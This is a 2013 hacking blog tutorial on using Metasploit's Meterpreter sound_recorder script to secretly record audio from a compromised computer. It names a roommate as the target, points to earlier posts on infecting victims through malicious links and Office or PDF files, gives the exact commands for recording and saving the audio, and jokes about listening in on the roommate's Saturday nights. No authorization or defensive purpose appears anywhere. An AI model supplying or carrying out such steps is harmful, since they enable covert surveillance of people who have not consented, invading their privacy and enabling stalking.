Hack Like a Pro: How to Remotely Record & Listen to the Microphone on Anyone's Computer

Mar 8, 2013 12:19 AM
Mar 8, 2013 03:49 PM
634982771040511698.jpg

Welcome back, my tenderfoot hackers!

So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.

Once again, let's fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via a malicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.

How to Record Computer Audio Remotely

From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.

634982737092824072.jpg

Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate's computer system and enables us to play back this recording at a later time.

Step 1: Find the sound__recorder.rb Script

As this script is relatively new (2010), let's make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.

root@bt > cd /opt/metasploit/msf3/scripts/meterpreter

634982737748181223.jpg

Once we are in this directory, simply do a listing of all files by typing:

root@bt: /opt/metasploit/msf3/scripts/meterpreter ls -l

The script should appear among the list of meterpreter scripts. If it doesn't, you can either update your Metasploit by typing in the msfconsole:

msf > msfupdate

Or you can download the script here.

Make sure that you save it to the directory /opt/metasploit/msf3/scripts/meterpreter.

Step 2: Run sound__recorder

Now that we have the script in the proper directory, let's run it. First, let's look at the help file by typing:

meterpreter > run sound_recorder -h

634982738022585705.jpg

Notice that we have just a couple options. We can specify the number of 30 second intervals to record with the –i switch and the directory to save the recorded file to with the –l switch. So, let's record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etc directory. We can do this by typing:

meterpreter > run sound_recorder -i 30 -l /etc

634982736625915252.jpg

Step 3: Play Back the Recording

When the recording has completed and run its course, the Meterpreter will save the recording to a file on our system in the directory we specified, or in this case the /etc directory.

Now we simply need to run that audio file in an audio player and we can hear everything that was going on in our roommate's room during that 15 minutes.

This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!

Cover photo by Zwola Fasola/Shutterstock

Comments

No Comments Exist

Be the first, drop a comment!